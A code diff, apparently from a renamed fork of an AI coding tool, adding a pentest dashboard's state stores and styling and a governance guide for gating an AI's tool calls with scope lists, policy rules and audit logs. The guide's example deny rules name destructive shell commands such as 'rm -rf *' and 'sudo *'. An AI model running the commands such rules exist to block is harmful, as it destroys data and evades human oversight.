+    const result = await complianceApi.assess(framework)
+
+    if (result.error) {
+      setState("error", result.error)
+      setState("assessing", false)
+      return null
+    }
+
+    if (result.data) {
+      setState("assessment", result.data.assessment)
+    }
+
+    setState("assessing", false)
+    return result.data?.assessment
+  },
+
+  clearAssessment() {
+    setState("assessment", null)
+  },
+
+  clearFramework() {
+    setState("selectedFramework", null)
+    setState("controls", [])
+    setState("categories", [])
+    setState("assessment", null)
+  },
+
+  getControlsByCategory(categoryId: string): ComplianceControl[] {
+    return state.controls.filter((c) => c.category === categoryId)
+  },
+
+  getAssessmentByCategory(categoryId: string) {
+    if (!state.assessment) return null
+
+    const categoryControls = state.assessment.controls.filter((c) => c.control.category === categoryId)
+
+    const passed = categoryControls.filter((c) => c.status === "pass").length
+    const failed = categoryControls.filter((c) => c.status === "fail").length
+    const partial = categoryControls.filter((c) => c.status === "partial").length
+    const total = categoryControls.length
+
+    return {
+      controls: categoryControls,
+      score: {
+        passed,
+        failed,
+        partial,
+        total,
+        percentage: total > 0 ? Math.round(((passed + partial * 0.5) / total) * 100) : 100,
+      },
+    }
+  },
+}
+
+export function useCompliance() {
+  const [loading, setLoading] = createSignal(true)
+
+  createEffect(() => {
+    complianceStore.fetchFrameworks().then(() => setLoading(false))
+  })
+
+  return {
+    frameworks: () => state.frameworks,
+    selectedFramework: () => state.selectedFramework,
+    controls: () => state.controls,
+    categories: () => state.categories,
+    assessment: () => state.assessment,
+    loading,
+    assessing: () => state.assessing,
+    error: () => state.error,
+    selectFramework: complianceStore.selectFramework,
+    runAssessment: complianceStore.runAssessment,
+  }
+}
diff --git a/packages/opencode/src/dashboard/src/stores/findings.ts b/packages/opencode/src/dashboard/src/stores/findings.ts
new file mode 100644
index 00000000000..86e74d699ae
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/stores/findings.ts
@@ -0,0 +1,203 @@
+/**
+ * Findings Store
+ *
+ * Reactive state management for security findings.
+ */
+
+import { createSignal, createEffect, onCleanup } from "solid-js"
+import { createStore, produce } from "solid-js/store"
+import { findingsApi, type Finding, type FindingFilters } from "../api/client"
+import { sseClient } from "../api/sse"
+
+export interface FindingsState {
+  findings: Finding[]
+  selectedFinding: Finding | null
+  loading: boolean
+  error: string | null
+  filters: FindingFilters
+  total: number
+}
+
+const [state, setState] = createStore<FindingsState>({
+  findings: [],
+  selectedFinding: null,
+  loading: false,
+  error: null,
+  filters: {},
+  total: 0,
+})
+
+export const findingsStore = {
+  // State accessors
+  get state() {
+    return state
+  },
+
+  // Actions
+  async fetchFindings(filters?: FindingFilters) {
+    setState("loading", true)
+    setState("error", null)
+
+    if (filters) {
+      setState("filters", filters)
+    }
+
+    const result = await findingsApi.list(state.filters)
+
+    if (result.error) {
+      setState("error", result.error)
+      setState("loading", false)
+      return
+    }
+
+    if (result.data) {
+      setState("findings", result.data.findings)
+      setState("total", result.data.total)
+    }
+
+    setState("loading", false)
+  },
+
+  async fetchFinding(id: string) {
+    setState("loading", true)
+    setState("error", null)
+
+    const result = await findingsApi.get(id)
+
+    if (result.error) {
+      setState("error", result.error)
+      setState("loading", false)
+      return null
+    }
+
+    if (result.data) {
+      setState("selectedFinding", result.data.finding)
+    }
+
+    setState("loading", false)
+    return result.data?.finding
+  },
+
+  async updateFinding(id: string, updates: Partial<Pick<Finding, "status" | "remediation" | "evidence">>) {
+    const result = await findingsApi.update(id, updates)
+
+    if (result.error) {
+      setState("error", result.error)
+      return null
+    }
+
+    if (result.data) {
+      // Update in list
+      setState(
+        "findings",
+        produce((findings) => {
+          const idx = findings.findIndex((f) => f.id === id)
+          if (idx >= 0) {
+            findings[idx] = result.data!.finding
+          }
+        })
+      )
+
+      // Update selected if same
+      if (state.selectedFinding?.id === id) {
+        setState("selectedFinding", result.data.finding)
+      }
+    }
+
+    return result.data?.finding
+  },
+
+  async deleteFinding(id: string) {
+    const result = await findingsApi.delete(id)
+
+    if (result.error) {
+      setState("error", result.error)
+      return false
+    }
+
+    // Remove from list
+    setState(
+      "findings",
+      state.findings.filter((f) => f.id !== id)
+    )
+    setState("total", state.total - 1)
+
+    // Clear selected if same
+    if (state.selectedFinding?.id === id) {
+      setState("selectedFinding", null)
+    }
+
+    return true
+  },
+
+  setFilters(filters: FindingFilters) {
+    setState("filters", filters)
+  },
+
+  clearSelectedFinding() {
+    setState("selectedFinding", null)
+  },
+
+  // SSE integration
+  setupRealtimeUpdates() {
+    const unsubCreate = sseClient.on("pentest.finding_created", (event) => {
+      const finding = event.properties.finding as Finding
+      if (finding) {
+        setState(
+          "findings",
+          produce((findings) => {
+            findings.unshift(finding)
+          })
+        )
+        setState("total", state.total + 1)
+      }
+    })
+
+    const unsubUpdate = sseClient.on("pentest.finding_updated", (event) => {
+      const finding = event.properties.finding as Finding
+      if (finding) {
+        setState(
+          "findings",
+          produce((findings) => {
+            const idx = findings.findIndex((f) => f.id === finding.id)
+            if (idx >= 0) {
+              findings[idx] = finding
+            }
+          })
+        )
+
+        if (state.selectedFinding?.id === finding.id) {
+          setState("selectedFinding", finding)
+        }
+      }
+    })
+
+    return () => {
+      unsubCreate()
+      unsubUpdate()
+    }
+  },
+}
+
+// Helper hooks
+export function useFindingsStore() {
+  return findingsStore
+}
+
+export function useFindings() {
+  const [loading, setLoading] = createSignal(true)
+
+  createEffect(() => {
+    findingsStore.fetchFindings().then(() => setLoading(false))
+  })
+
+  onCleanup(findingsStore.setupRealtimeUpdates())
+
+  return {
+    findings: () => state.findings,
+    loading,
+    error: () => state.error,
+    total: () => state.total,
+    refetch: () => findingsStore.fetchFindings(),
+  }
+}
diff --git a/packages/opencode/src/dashboard/src/stores/monitors.ts b/packages/opencode/src/dashboard/src/stores/monitors.ts
new file mode 100644
index 00000000000..55431a3d351
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/stores/monitors.ts
@@ -0,0 +1,188 @@
+/**
+ * Monitors Store
+ *
+ * Reactive state management for security monitors.
+ */
+
+import { createSignal, createEffect, onCleanup } from "solid-js"
+import { createStore, produce } from "solid-js/store"
+import { monitorsApi, type Monitor, type MonitorRun } from "../api/client"
+import { sseClient } from "../api/sse"
+
+export interface MonitorsState {
+  monitors: Monitor[]
+  selectedMonitor: Monitor | null
+  runs: MonitorRun[]
+  runningMonitors: string[]
+  loading: boolean
+  error: string | null
+  total: number
+}
+
+const [state, setState] = createStore<MonitorsState>({
+  monitors: [],
+  selectedMonitor: null,
+  runs: [],
+  runningMonitors: [],
+  loading: false,
+  error: null,
+  total: 0,
+})
+
+export const monitorsStore = {
+  get state() {
+    return state
+  },
+
+  async fetchMonitors(filters?: { sessionID?: string; status?: string }) {
+    setState("loading", true)
+    setState("error", null)
+
+    const result = await monitorsApi.list(filters)
+
+    if (result.error) {
+      setState("error", result.error)
+      setState("loading", false)
+      return
+    }
+
+    if (result.data) {
+      setState("monitors", result.data.monitors)
+      setState("total", result.data.total)
+    }
+
+    setState("loading", false)
+  },
+
+  async fetchMonitor(id: string) {
+    setState("loading", true)
+    setState("error", null)
+
+    const result = await monitorsApi.get(id)
+
+    if (result.error) {
+      setState("error", result.error)
+      setState("loading", false)
+      return null
+    }
+
+    if (result.data) {
+      setState("selectedMonitor", result.data.monitor)
+    }
+
+    setState("loading", false)
+    return result.data?.monitor
+  },
+
+  async fetchRuns(monitorId: string, limit?: number) {
+    const result = await monitorsApi.listRuns(monitorId, limit)
+
+    if (result.error) {
+      setState("error", result.error)
+      return
+    }
+
+    if (result.data) {
+      setState("runs", result.data.runs)
+    }
+  },
+
+  async triggerRun(monitorId: string) {
+    const result = await monitorsApi.triggerRun(monitorId)
+
+    if (result.error) {
+      setState("error", result.error)
+      return null
+    }
+
+    // Add to running monitors
+    setState(
+      "runningMonitors",
+      produce((running) => {
+        if (!running.includes(monitorId)) {
+          running.push(monitorId)
+        }
+      })
+    )
+
+    return result.data?.runId
+  },
+
+  clearSelectedMonitor() {
+    setState("selectedMonitor", null)
+    setState("runs", [])
+  },
+
+  setupRealtimeUpdates() {
+    const unsubStarted = sseClient.on("pentest.monitor.run_started", (event) => {
+      const monitorID = event.properties.monitorID as string
+      if (monitorID) {
+        setState(
+          "runningMonitors",
+          produce((running) => {
+            if (!running.includes(monitorID)) {
+              running.push(monitorID)
+            }
+          })
+        )
+      }
+    })
+
+    const unsubCompleted = sseClient.on("pentest.monitor.run_completed", (event) => {
+      const monitorID = event.properties.monitorID as string
+      if (monitorID) {
+        // Remove from running
+        setState(
+          "runningMonitors",
+          state.runningMonitors.filter((id) => id !== monitorID)
+        )
+
+        // Refresh monitors to get updated lastRunAt, runCount
+        monitorsStore.fetchMonitors()
+
+        // Refresh runs if we're viewing this monitor
+        if (state.selectedMonitor?.id === monitorID) {
+          monitorsStore.fetchRuns(monitorID, 10)
+        }
+      }
+    })
+
+    const unsubFailed = sseClient.on("pentest.monitor.run_failed", (event) => {
+      const monitorID = event.properties.monitorID as string
+      if (monitorID) {
+        setState(
+          "runningMonitors",
+          state.runningMonitors.filter((id) => id !== monitorID)
+        )
+
+        // Refresh monitors
+        monitorsStore.fetchMonitors()
+      }
+    })
+
+    return () => {
+      unsubStarted()
+      unsubCompleted()
+      unsubFailed()
+    }
+  },
+}
+
+export function useMonitors() {
+  const [loading, setLoading] = createSignal(true)
+
+  createEffect(() => {
+    monitorsStore.fetchMonitors().then(() => setLoading(false))
+  })
+
+  onCleanup(monitorsStore.setupRealtimeUpdates())
+
+  return {
+    monitors: () => state.monitors,
+    runningMonitors: () => state.runningMonitors,
+    loading,
+    error: () => state.error,
+    total: () => state.total,
+    refetch: () => monitorsStore.fetchMonitors(),
+  }
+}
diff --git a/packages/opencode/src/dashboard/src/stores/scans.ts b/packages/opencode/src/dashboard/src/stores/scans.ts
new file mode 100644
index 00000000000..bc2f491598e
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/stores/scans.ts
@@ -0,0 +1,148 @@
+/**
+ * Scans Store
+ *
+ * Reactive state management for scan results.
+ */
+
+import { createSignal, createEffect, onCleanup } from "solid-js"
+import { createStore, produce } from "solid-js/store"
+import { scansApi, type ScanResult } from "../api/client"
+import { sseClient } from "../api/sse"
+
+export interface ScansState {
+  scans: ScanResult[]
+  selectedScan: ScanResult | null
+  activeScans: string[]
+  loading: boolean
+  error: string | null
+  total: number
+}
+
+const [state, setState] = createStore<ScansState>({
+  scans: [],
+  selectedScan: null,
+  activeScans: [],
+  loading: false,
+  error: null,
+  total: 0,
+})
+
+export const scansStore = {
+  get state() {
+    return state
+  },
+
+  async fetchScans(filters?: { sessionID?: string; target?: string; scanType?: string; limit?: number }) {
+    setState("loading", true)
+    setState("error", null)
+
+    const result = await scansApi.list(filters)
+
+    if (result.error) {
+      setState("error", result.error)
+      setState("loading", false)
+      return
+    }
+
+    if (result.data) {
+      setState("scans", result.data.scans)
+      setState("total", result.data.total)
+    }
+
+    setState("loading", false)
+  },
+
+  async fetchScan(id: string) {
+    setState("loading", true)
+    setState("error", null)
+
+    const result = await scansApi.get(id)
+
+    if (result.error) {
+      setState("error", result.error)
+      setState("loading", false)
+      return null
+    }
+
+    if (result.data) {
+      setState("selectedScan", result.data.scan)
+    }
+
+    setState("loading", false)
+    return result.data?.scan
+  },
+
+  clearSelectedScan() {
+    setState("selectedScan", null)
+  },
+
+  setupRealtimeUpdates() {
+    const unsubStarted = sseClient.on("pentest.scan_started", (event) => {
+      const scanID = event.properties.scanID as string
+      if (scanID) {
+        setState(
+          "activeScans",
+          produce((active) => {
+            if (!active.includes(scanID)) {
+              active.push(scanID)
+            }
+          })
+        )
+      }
+    })
+
+    const unsubCompleted = sseClient.on("pentest.scan_completed", (event) => {
+      const scan = event.properties.scan as ScanResult
+      if (scan) {
+        // Remove from active
+        setState(
+          "activeScans",
+          state.activeScans.filter((id) => id !== scan.id)
+        )
+
+        // Add to scans list
+        setState(
+          "scans",
+          produce((scans) => {
+            const idx = scans.findIndex((s) => s.id === scan.id)
+            if (idx >= 0) {
+              scans[idx] = scan
+            } else {
+              scans.unshift(scan)
+            }
+          })
+        )
+        setState("total", state.total + 1)
+
+        // Update selected if same
+        if (state.selectedScan?.id === scan.id) {
+          setState("selectedScan", scan)
+        }
+      }
+    })
+
+    return () => {
+      unsubStarted()
+      unsubCompleted()
+    }
+  },
+}
+
+export function useScans() {
+  const [loading, setLoading] = createSignal(true)
+
+  createEffect(() => {
+    scansStore.fetchScans().then(() => setLoading(false))
+  })
+
+  onCleanup(scansStore.setupRealtimeUpdates())
+
+  return {
+    scans: () => state.scans,
+    activeScans: () => state.activeScans,
+    loading,
+    error: () => state.error,
+    total: () => state.total,
+    refetch: () => scansStore.fetchScans(),
+  }
+}
diff --git a/packages/opencode/src/dashboard/src/styles/dashboard.css b/packages/opencode/src/dashboard/src/styles/dashboard.css
new file mode 100644
index 00000000000..9befa1715bd
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/styles/dashboard.css
@@ -0,0 +1,133 @@
+@tailwind base;
+@tailwind components;
+@tailwind utilities;
+
+@layer base {
+  html {
+    @apply antialiased;
+  }
+
+  body {
+    @apply min-h-screen;
+  }
+
+  ::-webkit-scrollbar {
+    @apply w-2 h-2;
+  }
+
+  ::-webkit-scrollbar-track {
+    @apply bg-gray-800;
+  }
+
+  ::-webkit-scrollbar-thumb {
+    @apply bg-gray-600 rounded;
+  }
+
+  ::-webkit-scrollbar-thumb:hover {
+    @apply bg-gray-500;
+  }
+}
+
+@layer components {
+  .card {
+    @apply bg-gray-800 rounded-lg border border-gray-700 p-4;
+  }
+
+  .card-header {
+    @apply text-lg font-semibold text-gray-100 mb-4;
+  }
+
+  .btn {
+    @apply px-4 py-2 rounded-lg font-medium transition-colors duration-200;
+  }
+
+  .btn-primary {
+    @apply bg-blue-600 hover:bg-blue-700 text-white;
+  }
+
+  .btn-secondary {
+    @apply bg-gray-700 hover:bg-gray-600 text-gray-100;
+  }
+
+  .btn-danger {
+    @apply bg-red-600 hover:bg-red-700 text-white;
+  }
+
+  .btn-success {
+    @apply bg-green-600 hover:bg-green-700 text-white;
+  }
+
+  .input {
+    @apply bg-gray-700 border border-gray-600 rounded-lg px-3 py-2 text-gray-100 placeholder-gray-400 focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-transparent;
+  }
+
+  .select {
+    @apply bg-gray-700 border border-gray-600 rounded-lg px-3 py-2 text-gray-100 focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-transparent;
+  }
+
+  .badge {
+    @apply inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-medium;
+  }
+
+  .badge-critical {
+    @apply bg-red-900 text-red-200;
+  }
+
+  .badge-high {
+    @apply bg-orange-900 text-orange-200;
+  }
+
+  .badge-medium {
+    @apply bg-yellow-900 text-yellow-200;
+  }
+
+  .badge-low {
+    @apply bg-blue-900 text-blue-200;
+  }
+
+  .badge-info {
+    @apply bg-gray-700 text-gray-300;
+  }
+
+  .table {
+    @apply w-full text-left;
+  }
+
+  .table th {
+    @apply px-4 py-3 text-xs font-medium text-gray-400 uppercase tracking-wider border-b border-gray-700;
+  }
+
+  .table td {
+    @apply px-4 py-3 text-sm text-gray-300 border-b border-gray-700;
+  }
+
+  .table tr:hover td {
+    @apply bg-gray-750;
+  }
+
+  .nav-link {
+    @apply flex items-center gap-3 px-3 py-2 text-gray-400 hover:text-gray-100 hover:bg-gray-800 rounded-lg transition-colors;
+  }
+
+  .nav-link-active {
+    @apply text-blue-400 bg-gray-800;
+  }
+
+  .stat-card {
+    @apply bg-gray-800 rounded-lg p-4 border border-gray-700;
+  }
+
+  .stat-value {
+    @apply text-2xl font-bold text-gray-100;
+  }
+
+  .stat-label {
+    @apply text-sm text-gray-400;
+  }
+}
+
+@layer utilities {
+  .bg-gray-750 {
+    background-color: rgb(38 42 51);
+  }
+}
diff --git a/packages/opencode/src/dashboard/tailwind.config.js b/packages/opencode/src/dashboard/tailwind.config.js
new file mode 100644
index 00000000000..291c210bd32
--- /dev/null
+++ b/packages/opencode/src/dashboard/tailwind.config.js
@@ -0,0 +1,24 @@
+/** @type {import('tailwindcss').Config} */
+export default {
+  content: ["./index.html", "./src/**/*.{js,ts,jsx,tsx}"],
+  theme: {
+    extend: {
+      colors: {
+        severity: {
+          critical: "#dc2626",
+          high: "#ea580c",
+          medium: "#ca8a04",
+          low: "#2563eb",
+          info: "#6b7280",
+        },
+        status: {
+          open: "#ef4444",
+          confirmed: "#f97316",
+          mitigated: "#22c55e",
+          false_positive: "#6b7280",
+        },
+      },
+    },
+  },
+  plugins: [],
+}
diff --git a/packages/opencode/src/dashboard/tsconfig.json b/packages/opencode/src/dashboard/tsconfig.json
new file mode 100644
index 00000000000..adce1369d26
--- /dev/null
+++ b/packages/opencode/src/dashboard/tsconfig.json
@@ -0,0 +1,25 @@
+{
+  "compilerOptions": {
+    "target": "ES2020",
+    "useDefineForClassFields": true,
+    "module": "ESNext",
+    "lib": ["ES2020", "DOM", "DOM.Iterable"],
+    "skipLibCheck": true,
+    "moduleResolution": "bundler",
+    "allowImportingTsExtensions": true,
+    "resolveJsonModule": true,
+    "isolatedModules": true,
+    "noEmit": true,
+    "jsx": "preserve",
+    "jsxImportSource": "solid-js",
+    "strict": true,
+    "noUnusedLocals": true,
+    "noUnusedParameters": true,
+    "noFallthroughCasesInSwitch": true,
+    "baseUrl": ".",
+    "paths": {
+      "@/*": ["src/*"]
+    }
+  },
+  "include": ["src"]
+}
diff --git a/packages/opencode/src/dashboard/vite.config.ts b/packages/opencode/src/dashboard/vite.config.ts
new file mode 100644
index 00000000000..64a56eb5fe4
--- /dev/null
+++ b/packages/opencode/src/dashboard/vite.config.ts
@@ -0,0 +1,33 @@
+import { defineConfig } from "vite"
+import solid from "vite-plugin-solid"
+import path from "path"
+
+export default defineConfig({
+  plugins: [solid()],
+  root: path.resolve(__dirname),
+  base: "/dashboard/",
+  build: {
+    outDir: path.resolve(__dirname, "dist"),
+    emptyOutDir: true,
+    sourcemap: true,
+  },
+  resolve: {
+    alias: {
+      "@": path.resolve(__dirname, "src"),
+    },
+  },
+  server: {
+    port: 5173,
+    proxy: {
+      "/pentest": {
+        target: "http://localhost:4096",
+        changeOrigin: true,
+      },
+      "/global": {
+        target: "http://localhost:4096",
+        changeOrigin: true,
+        ws: true,
+      },
+    },
+  },
+})
diff --git a/packages/opencode/src/global/index.ts b/packages/opencode/src/global/index.ts
index d3011b41506..0968eaf511a 100644
--- a/packages/opencode/src/global/index.ts
+++ b/packages/opencode/src/global/index.ts
@@ -3,7 +3,7 @@ import { xdgData, xdgCache, xdgConfig, xdgState } from "xdg-basedir"
 import path from "path"
 import os from "os"
 
-const app = "opencode"
+const app = "cyxwiz"
 
 const data = path.join(xdgData!, app)
 const cache = path.join(xdgCache!, app)
@@ -12,9 +12,9 @@ const state = path.join(xdgState!, app)
 
 export namespace Global {
   export const Path = {
-    // Allow override via OPENCODE_TEST_HOME for test isolation
+    // Allow override via CYXWIZ_TEST_HOME for test isolation
     get home() {
-      return process.env.OPENCODE_TEST_HOME || os.homedir()
+      return process.env.CYXWIZ_TEST_HOME || os.homedir()
     },
     data,
     bin: path.join(data, "bin"),
diff --git a/packages/opencode/src/governance/GOVERNANCE.md b/packages/opencode/src/governance/GOVERNANCE.md
new file mode 100644
index 00000000000..a0eea9f79e6
--- /dev/null
+++ b/packages/opencode/src/governance/GOVERNANCE.md
@@ -0,0 +1,670 @@
+# Governance Engine Documentation
+
+The Governance Engine provides centralized control over AI tool executions in cyxwiz. It enforces scope restrictions, evaluates policy-based rules, and maintains comprehensive audit logs for all tool operations.
+
+---
+
+## Table of Contents
+
+- [Overview](#overview)
+- [Quick Start](#quick-start)
+- [Architecture](#architecture)
+- [Configuration Reference](#configuration-reference)
+- [Module Reference](#module-reference)
+- [Usage Examples](#usage-examples)
+- [Integration Guide](#integration-guide)
+- [Troubleshooting](#troubleshooting)
+
+---
+
+## Overview
+
+### What is the Governance Engine?
+
+The Governance Engine is a security layer that intercepts all tool executions before they run. It provides:
+
+- **Scope Enforcement**: Restrict which IPs and domains tools can access
+- **Policy Rules**: Define what actions to take for specific tools/commands
+- **Audit Logging**: Complete audit trail of all tool executions
+- **Real-time Events**: Bus events for monitoring and alerting
+
+### When to Use Governance
+
+Enable governance when you need to:
+
+- Restrict AI access to internal networks only
+- Block access to production systems
+- Auto-approve safe, read-only operations
+- Maintain compliance audit trails
+- Monitor tool usage patterns
+
+---
+
+## Quick Start
+
+### 1. Enable Governance
+
+Add to your `opencode.jsonc` or project config:
+
+```jsonc
+{
+  "governance": {
+    "enabled": true,
+    "default_action": "require-approval"
+  }
+}
+```
+
+### 2. Add Scope Restrictions
+
+Limit which networks the AI can access:
+
+```jsonc
+{
+  "governance": {
+    "enabled": true,
+    "scope": {
+      "ip": {
+        "allow": ["10.0.0.0/8", "192.168.0.0/16"]
+      },
+      "domain": {
+        "allow": ["*.company.com", "github.com"],
+        "deny": ["*.prod.company.com"]
+      }
+    }
+  }
+}
+```
+
+### 3. Add Policy Rules
+
+Define actions for specific tools:
+
+```jsonc
+{
+  "governance": {
+    "enabled": true,
+    "policies": [
+      {
+        "description": "Auto-approve read-only tools",
+        "action": "auto-approve",
+        "tools": ["read", "glob", "grep"]
+      },
+      {
+        "description": "Block dangerous commands",
+        "action": "blocked",
+        "tools": ["bash"],
+        "commands": ["rm -rf *", "sudo *"]
+      }
+    ],
+    "default_action": "require-approval"
+  }
+}
+```
+
+---
+
+## Architecture
+
+### Execution Flow
+
+```
+┌─────────────────────────────────────────────────────────────────┐
+│                     Tool Execution Request                      │
+│                   (bash, read, webfetch, etc.)                  │
+└─────────────────────────────────────────────────────────────────┘
+                                │
+                                ▼
+┌─────────────────────────────────────────────────────────────────┐
+│                      1. Target Extraction                       │
+│         Analyze tool arguments for IPs, domains, URLs           │
+└─────────────────────────────────────────────────────────────────┘
+                                │
+                                ▼
+┌─────────────────────────────────────────────────────────────────┐
+│                       2. Scope Check                            │
+│            Verify targets against allow/deny lists              │
+│                                                                 │
+│   ┌─────────────┐         ┌─────────────┐                      │
+│   │ IP/CIDR     │         │  Domain     │                      │
+│   │ Matching    │         │  Wildcards  │                      │
+│   └─────────────┘         └─────────────┘                      │
+└─────────────────────────────────────────────────────────────────┘
+                                │
+                    ┌───────────┴───────────┐
+                    │                       │
+              Scope Passed            Scope Failed
+                    │                       │
+                    ▼                       ▼
+┌───────────────────────────┐    ┌───────────────────────┐
+│   3. Policy Evaluation    │    │   DENIED              │
+│   Match against rules     │    │   (Scope Violation)   │
+│   First match wins        │    └───────────────────────┘
+└───────────────────────────┘
+                    │
+        ┌───────────┼───────────┐
+        │           │           │
+        ▼           ▼           ▼
+┌───────────┐ ┌───────────┐ ┌───────────┐
+│   auto-   │ │  require- │ │  blocked  │
+│  approve  │ │  approval │ │           │
+└───────────┘ └───────────┘ └───────────┘
+        │           │           │
+        ▼           ▼           ▼
+   Execute      Ask User     DENIED
+   Directly     Permission   (Policy)
+                                │
+                                ▼
+┌─────────────────────────────────────────────────────────────────┐
+│                      4. Audit Logging                           │
+│              Record outcome, publish bus events                 │
+└─────────────────────────────────────────────────────────────────┘
+```
+
+### Module Structure
+
+```
+src/governance/
+├── index.ts      # Main entry point, orchestration
+├── types.ts      # Zod schemas, TypeScript types
+├── matcher.ts    # Target extraction and pattern matching
+├── scope.ts      # IP/domain scope enforcement
+├── policy.ts     # Policy rule evaluation
+└── audit.ts      # Audit logging and events
+```
+
+---
+
+## Configuration Reference
+
+### Full Schema
+
+```typescript
+interface GovernanceConfig {
+  // Master switch - governance is disabled by default
+  enabled?: boolean  // default: false
+
+  // Network scope restrictions
+  scope?: {
+    ip?: {
+      allow?: string[]  // CIDR patterns: ["10.0.0.0/8"]
+      deny?: string[]   // Deny takes precedence
+    }
+    domain?: {
+      allow?: string[]  // Wildcards: ["*.company.com"]
+      deny?: string[]   // Deny takes precedence
+    }
+  }
+
+  // Policy rules (evaluated in order, first match wins)
+  policies?: Array<{
+    action: "auto-approve" | "require-approval" | "blocked"
+    tools?: string[]      // Tool name patterns
+    commands?: string[]   // Bash command patterns
+    targets?: string[]    // Network target patterns
+    description?: string  // For logs and auditing
+  }>
+
+  // Action when no policy matches
+  default_action?: "auto-approve" | "require-approval" | "blocked"
+  // default: "require-approval"
+
+  // Audit logging configuration
+  audit?: {
+    enabled?: boolean        // default: true
+    storage?: "file" | "memory"  // default: "file"
+    retention?: number       // Days to keep logs
+    include_args?: boolean   // Log tool arguments (privacy)
+  }
+}
+```
+
+### Configuration Options
+
+#### `enabled`
+- **Type**: `boolean`
+- **Default**: `false`
+- **Description**: Master switch for governance. Must be explicitly set to `true`.
+
+#### `scope.ip.allow` / `scope.ip.deny`
+- **Type**: `string[]`
+- **Format**: CIDR notation (`10.0.0.0/8`, `192.168.1.0/24`)
+- **Description**: IP address restrictions. Deny rules are checked first.
+
+#### `scope.domain.allow` / `scope.domain.deny`
+- **Type**: `string[]`
+- **Format**: Wildcard patterns (`*.example.com`, `api.github.com`)
+- **Description**: Domain restrictions. Deny rules are checked first.
+
+#### `policies[].action`
+- **Type**: `"auto-approve" | "require-approval" | "blocked"`
+- **Description**:
+  - `auto-approve`: Execute without user confirmation
+  - `require-approval`: Ask user for permission (existing behavior)
+  - `blocked`: Deny execution entirely
+
+#### `policies[].tools`
+- **Type**: `string[]`
+- **Format**: Wildcard patterns (`bash`, `read`, `mcp_*`)
+- **Description**: Match tool names
+
+#### `policies[].commands`
+- **Type**: `string[]`
+- **Format**: Wildcard patterns (`ssh *`, `curl *`, `rm -rf *`)
+- **Description**: Match bash command strings (only applies when tool is `bash`)
+
+#### `policies[].targets`
+- **Type**: `string[]`
+- **Format**: CIDR or wildcard patterns
+- **Description**: Match extracted network targets
+
+#### `default_action`
+- **Type**: `"auto-approve" | "require-approval" | "blocked"`
+- **Default**: `"require-approval"`
+- **Description**: Action when no policy matches
+
+#### `audit.storage`
+- **Type**: `"file" | "memory"`
+- **Default**: `"file"`
+- **Description**: Where to store audit entries
+
+#### `audit.include_args`
+- **Type**: `boolean`
+- **Default**: `false`
+- **Description**: Include tool arguments in audit logs (may contain sensitive data)
+
+---
+
+## Module Reference
+
+### Types (`types.ts`)
+
+Core type definitions using Zod schemas.
+
+| Type | Description |
+|------|-------------|
+| `Outcome` | `"allowed"` \| `"denied"` \| `"pending-approval"` \| `"error"` |
+| `TargetType` | `"ip"` \| `"cidr"` \| `"domain"` \| `"url"` \| `"unknown"` |
+| `Target` | `{ raw: string, type: TargetType, normalized: string }` |
+| `AuditEntry` | Complete audit record with id, timestamp, tool, outcome, etc. |
+| `CheckRequest` | Input to `Governance.check()` |
+| `CheckResult` | Output from `Governance.check()` |
+
+**Bus Events:**
+- `governance.checked` - Published after every governance check
+- `governance.policy_violation` - Published when a tool is denied
+
+### Matcher (`matcher.ts`)
+
+Target extraction and pattern matching utilities.
+
+| Function | Description |
+|----------|-------------|
+| `classifyTarget(raw)` | Classify string as IP, CIDR, domain, URL, or unknown |
+| `extractTargets(tool, args)` | Extract network targets from tool arguments |
+| `ipInCidr(ip, cidr)` | Check if IP falls within CIDR range |
+| `matchTarget(target, pattern)` | Match target against pattern |
+
+**Tool-specific extraction:**
+- `bash`: Analyzes command for URLs, IPs, SSH patterns (`user@host`), and common tools (curl, wget, ssh, etc.)
+- `webfetch`: Extracts the `url` argument directly
+- `websearch`: No network targets (search queries)
+- Other tools: Scans all string argument values
+
+### Scope (`scope.ts`)
+
+Network scope enforcement.
+
+| Function | Description |
+|----------|-------------|
+| `check(targets, scope)` | Validate all targets against scope configuration |
+
+**Evaluation order:**
+1. Check deny list first - if matches, immediately deny
+2. Check allow list - if exists and doesn't match, deny
+3. Default to allow
+
+### Policy (`policy.ts`)
+
+Policy rule evaluation.
+
+| Function | Description |
+|----------|-------------|
+| `evaluate(tool, args, targets, policies, defaultAction)` | Evaluate policies, return action |
+| `describe(policy)` | Get human-readable policy description |
+
+**Matching rules (AND logic):**
+- `tools`: Tool name must match at least one pattern
+- `commands`: Bash command must match at least one pattern
+- `targets`: At least one target must match at least one pattern
+
+**First match wins** - policy order matters!
+
+### Audit (`audit.ts`)
+
+Audit logging and querying.
+
+| Function | Description |
+|----------|-------------|
+| `record(entry, config)` | Record an audit entry |
+| `list(config, options)` | Query audit entries with filters |
+| `get(id)` | Get single audit entry by ID |
+| `clearMemory()` | Clear in-memory buffer (testing) |
+| `memoryCount()` | Get count of entries in memory |
+
+### Main (`index.ts`)
+
+Main entry point and orchestration.
+
+| Export | Description |
+|--------|-------------|
+| `Governance.check(request, config)` | Main governance check function |
+| `Governance.isEnabled(config)` | Check if governance is enabled |
+| `Governance.DeniedError` | Error thrown when tool is blocked |
+| `Governance.Types` | Re-export of types namespace |
+| `Governance.Scope` | Re-export of scope namespace |
+| `Governance.Policy` | Re-export of policy namespace |
+| `Governance.Audit` | Re-export of audit namespace |
+| `Governance.Matcher` | Re-export of matcher namespace |
+
+---
+
+## Usage Examples
+
+### Basic Governance Check
+
+```typescript
+import { Governance } from "./governance"
+import { Config } from "./config/config"
+
+const config = await Config.get()
+
+const result = await Governance.check(
+  {
+    sessionID: "session_abc",
+    callID: "call_123",
+    tool: "bash",
+    args: { command: "curl https://api.example.com/data" }
+  },
+  config.governance
+)
+
+if (!result.allowed) {
+  console.log(`Blocked: ${result.reason}`)
+  console.log(`Policy: ${result.matchedPolicy}`)
+}
+```
+
+### Subscribe to Governance Events
+
+```typescript
+import { Bus } from "./bus"
+import { Governance } from "./governance"
+
+// Monitor all governance checks
+Bus.subscribe(Governance.Types.Event.Checked, ({ entry }) => {
+  console.log(`[${entry.outcome}] ${entry.tool}`)
+  if (entry.targets.length > 0) {
+    console.log(`  Targets: ${entry.targets.map(t => t.normalized).join(", ")}`)
+  }
+})
+
